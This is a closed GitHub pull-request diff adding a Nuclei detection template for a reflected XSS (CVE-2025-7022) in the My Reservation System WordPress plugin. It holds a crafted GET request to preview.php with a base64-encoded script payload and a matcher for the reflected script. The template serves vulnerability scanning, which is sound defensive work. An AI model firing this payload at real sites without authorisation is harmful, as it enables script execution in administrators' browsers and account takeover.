Skip to content
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
39 changes: 39 additions & 0 deletions http/cves/2025/CVE-2025-7022.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
id: CVE-2025-7022

info:
name: My Reservation System WordPress - Reflected XSS
author: Sourabh-Sahu
severity: medium
description: |
My Reservation System WordPress plugin through 2.3 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
impact: |
Attackers can execute scripts in admin users' browsers, potentially leading to account takeover or privilege escalation.
remediation: |
Update to the latest version beyond 2.3.
reference:
- https://wpscan.com/vulnerability/c1021763-075b-40c7-801d-b5519828aabe/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-7022
epss-score: 0.00024
epss-percentile: 0.05911
metadata:
verified: true
max-request: 3
vendor: None
product: None
tags: cve,cve2025

http:
- raw:
- |
GET /wp-content/plugins/my-reservation-system/preview.php?val=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "<script>alert(1)</script>")
condition: and
Loading